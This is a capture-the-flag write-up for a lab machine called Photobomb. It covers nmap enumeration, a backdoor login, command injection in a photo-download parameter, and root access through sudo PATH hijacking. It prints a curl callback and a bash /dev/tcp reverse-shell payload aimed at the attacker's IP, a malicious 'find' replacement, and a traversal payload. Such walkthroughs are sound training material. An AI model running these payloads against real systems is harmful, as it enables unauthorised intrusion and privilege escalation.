Hi everyone! This write-up is on an easy Linux machine which focused on enumerating the webpage source for backdoor access to login to a webpage, using command injection vulnerability for initial access, and path hijacking via sudo for root privilege. Let’s get started!
1. Nmap enumeration
$ IP=10.10.11.182 $ sudo nmap -sC -sV -p- $IP ... PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA) | 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA) |_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://photobomb.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Based on the nmap result, we can see that the domain name is “photobomb.htb“.
2. Web enumeration
Firstly, we should add the domain name into the hosts file.
$ sudo nano /etc/hosts
In /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.182 photobomb.htb
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Remember to change the IP address to your IP address. Once changed, we can visit the website via our browser.

If we click on “click here”, we will be prompted with a login pop-up.
2.1 Login backdoor
When looking at the main page’s source code, I went into photobomb.js and noticed there is a backdoor login URL provided that is used by tech support if they forget the login credentials.

Using the login URL, we will login into the dashboard.

2.1 Command injection via a web request parameter
Firstly, we will need to host a web server using Python.
$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Using burpsuite when we attempts to download a photo, we will intercept a POST request. Do a command injection to the filetype parameter to do a curl request back to our HTTP server and forward the request. Remember to change the IP to your own machine’s IP address. You will also need to URL-encode it. We should see that our HTTP server receive an incoming connection from the victim.
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | curl http://10.10.16.18&dimensions=3000x2000


2.2 Reverse shell
We can now get a reverse shell. Firstly, we will need to set a netcat listener.
nc -lvnp 443
Next, we can use burpsuite again for command injection to use bash reverse shell to connect to our netcat listener. Remember to URL-encode it.
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.18/443 0>&1'&dimensions=3000x2000

Our netcat should received a reverse shell. We can make it TTY.
$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.16.18] from (UNKNOWN) [10.10.11.182] 57482 bash: cannot set terminal process group (736): Inappropriate ioctl for device bash: no job control in this shell wizard@photobomb:~/photobomb$ python3 -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' wizard@photobomb:~/photobomb$
2.3 Get the user flag
wizard@photobomb:~/photobomb$ cd ~ cd ~ wizard@photobomb:~$ ls ls photobomb user.txt wizard@photobomb:~$ cat user.txt cat user.txt b5****************************** wizard@photobomb:~$
3. Privilege escalation
3.1 Sudo privilege
wizard@photobomb:~$ sudo -l sudo -l Matching Defaults entries for wizard on photobomb: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wizard may run the following commands on photobomb: (root) SETENV: NOPASSWD: /opt/cleanup.sh
We can see that our current user have privileges to set the environment variable run the script as root.
3.2 Path hijacking
I first checked if the user has write permission to it. After discovering that it doesn’t, I printed the content of the script and noticed that it is vulnerable to path hijacking.
wizard@photobomb:~$ ls -l /opt/cleanup.sh ls -l /opt/cleanup.sh -r-xr-xr-x 1 root root 340 Sep 15 12:11 /opt/cleanup.sh wizard@photobomb:~$ cat /opt/cleanup.sh cat /opt/cleanup.sh #!/bin/bash . /opt/.bashrc cd /home/wizard/photobomb # clean up log files if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ] then /bin/cat log/photobomb.log > log/photobomb.log.old /usr/bin/truncate -s0 log/photobomb.log fi # protect the priceless originals find source_images -type f -name '*.jpg' -exec chown root:root {} \;
I decided to hijack the find command by creating a malicious find file in the current user’s home directory that will spawn a shell. Since the file will be executed by root, the shell spawned will have root privileges. After changing the file’s permission to allow execution, I used sudo to run the script while setting the PATH to search for the current user’s home directory first for commands. As a result, this spawned a root shell.
wizard@photobomb:~$ echo "/bin/bash -p" > find echo "/bin/bash -p" > find wizard@photobomb:~$ chmod 777 find chmod 777 find wizard@photobomb:~$ pwd pwd /home/wizard wizard@photobomb:~$ sudo PATH=/home/wizard:$PATH /opt/cleanup.sh sudo PATH=/home/wizard:$PATH /opt/cleanup.sh root@photobomb:/home/wizard/photobomb#
3.3 Getting root flag
root@photobomb:/home/wizard/photobomb# cd ~ cd ~ root@photobomb:~# ls ls root.txt root@photobomb:~# cat root.txt cat root.txt ae******************************
4. Additional stuff
This section contains stuff that does not help us to get the flag but discover to let us know what methods are dead ends.
4.1 Local File Inclusion (LFI) not possible
Similarly, using burpsuite, I tried to fuzz the photo parameter by encoding a LFI path to passwd file with a NULL byte (cheatsheet from HackTricks).
photo=%252e%252e%252fetc%252fpasswd%00&filetype=jpg&dimensions=3000x2000

It should dump out an error. Expanding the first row, we will be able to see the partial source code that checks our filename. Note that there is a check for forward slash /, and double dots … This is to prevent file traversal. As a result, there is no way for us to bypass which means LFI is a rabbit hole.

I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂